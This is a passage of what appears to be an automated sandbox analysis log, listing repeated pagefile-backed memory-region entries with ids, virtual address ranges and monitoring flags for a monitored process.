filename = "" Region: id = 8038 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8039 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8040 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8041 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8042 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8043 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8044 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8045 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8046 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8047 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8048 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8049 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8050 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8051 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8052 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8053 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8054 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8055 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8056 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8057 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8058 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8059 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8060 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8061 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8062 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8063 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8064 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8065 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8066 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8067 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8068 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8069 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8070 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8071 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8072 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8073 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8074 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8075 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8076 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8077 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8078 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8079 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8080 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8081 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8082 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8083 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8084 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8085 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8086 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8087 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8088 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8089 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8090 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8091 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8092 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8093 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8094 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8095 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8096 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8097 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8098 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8099 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8100 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8101 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8102 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8103 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8104 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8105 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8106 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8107 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8108 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8109 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8110 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8111 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8112 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8113 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8114 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8115 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8116 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8117 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8118 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8119 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8120 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8121 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8122 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8123 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8124 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8125 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8126 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8127 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8128 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8129 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8130 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8131 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8132 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8133 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8134 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8135 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8136 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8137 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8138 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8139 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8140 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8141 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8142 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8143 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8144 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8145 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8146 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8147 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8148 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8149 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8150 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8151 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8152 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8153 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8154 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8155 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8156 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8157 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8158 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8159 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8160 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8161 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8162 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8163 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8164 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8165 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8166 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8167 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8168 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8169 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8170 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8171 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8172 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8173 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8174 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8175 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8176 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8177 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8178 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8179 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8180 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8181 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8182 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8183 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8184 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8185 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8186 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8187 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8188 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8189 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8190 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8191 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8192 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8193 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8194 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8195 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8196 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8197 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8198 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8199 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8200 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8201 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8202 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8203 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8204 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 8205 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8206 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8207 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8208 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8209 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8210 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8211 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8212 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8213 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8214 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8215 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 8216 